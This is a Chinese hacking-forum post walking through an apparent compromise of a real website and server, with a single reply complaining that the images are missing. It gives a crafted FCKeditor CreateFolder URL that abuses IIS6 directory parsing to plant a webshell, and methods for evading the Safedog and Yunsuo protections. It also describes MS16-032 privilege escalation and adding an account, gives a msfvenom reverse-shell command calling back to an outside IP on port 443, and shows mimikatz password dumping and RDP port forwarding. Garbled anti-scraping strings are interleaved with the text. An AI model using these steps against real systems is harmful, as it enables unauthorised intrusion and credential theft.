找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2180|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

2 `: D0 Q8 x% Z' e' v6 s

3 Y' m- }* a5 |! K* M4 _# i' A, J/ O0 Y# z9 _) }0 o9 s3 j# v' O5 F" \2 `, W9 k T, w7 P8 P) \5 `6 L3 l% |& p) h# S5 \9 q) M3 n u8 H- O3 ?7 M1 X
$ Y, Z+ b) |2 C; _+ a* z* u# T! s, t

( Q2 C2 n7 w4 S8 J8 O7 D& |9 p& a
2 L1 i( s. ?% a x# R1 t s
一、 利用getwebshell
7 l, O" ], i% {1 | d+ R/ p; i
0 w8 ]; S6 Y. j% v8 j
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
5 f+ b e0 R) S; n; m& V
) \; j7 v5 a" B0 k- M' K222.png
8 n5 Q8 z# r ]# H, P
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
( N1 @# f( K/ U$ o 333.png
1 X8 ~% ^; H, [3 `8 p2 h" x
下面我们构造一个asp目录,如: : U0 J+ A M# ]0 v* a* G

5 K4 B2 ]$ i3 L

& ^3 |( q. h5 C5 y http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 + h# E9 j3 K: P" e

9 Z. |2 Z7 m9 Q& a2 Y2 J, @

0 Y$ R6 U6 T! o/ `3 ? 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
! X6 S9 J B* M7 T2 t! a: p; |; w
6 z3 Z2 D# a+ [/ b8 W5 Q
一、 绕过安全狗云锁提权并且加账号
6 f. l6 F K+ r& e6 Z 444.png
2 o7 ]! ]! N9 R5 j2 B/ b
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
' c0 R3 z3 F2 w# |' D% |
$ {9 i% o1 e3 W# H( l+ P
如图:
# q6 X" D. J& n2 Z2 F555.png
5 ]* y- ]# E% @# x7 ~
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
* Z( \6 Y, Y. k% s1 f+ ?7 D
M" h5 \' L+ m5 s8 u: V1 c- [0 P
一、 利用metasploit
5 v7 B9 ~4 O6 G
% P# f& z) p" Z; M" [
首先用pentestbox生成一个64位的payload如下命令
6 X8 q2 Q6 Q; l& d2 g) x* o& [, n
0 G/ c# Q- `+ S2 F msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
4 [2 f q% U5 Y3 U! m4 Q3 I
. B4 |1 }/ F4 N+ E- P; y' Q0 @: \
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
# ]) }5 b- v1 Q' M. ` 11.png
% u! T. }7 x0 c0 z
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
1 R, N2 |. k# R: v 13.png
& }2 _ @0 A( }1 r
下面我们来做一个监听如下命令:
' T8 O+ H% ^ n L: _8 {0 z
4 ~9 j- k3 A r4 B1 ~portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
7 Z" M6 {8 \6 M) ~" [# c- v 18.png
5 c0 ^# M( p7 n; e' U1 j: D- C! P

+ {% D' n! W1 n+ p
v7 C! u8 @; T6 N( a- e( K# `

. R8 v( ~% m4 p/ K C$ d+ x

: x* X9 }; ^5 E* m* Q
2 {( N/ J! K2 F: ?- l x
& c, p6 Q& U2 u0 n0 |
, J9 v' l9 {& n4 X2 @

2 M6 S' v% u. x: o) \- ]; q
3 N8 K1 i u: V 5 j( g9 g& b$ S; U b

1 w2 I3 B6 t7 I$ O
% H1 l$ I& h" v* v/ }! C( X+ u* w

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表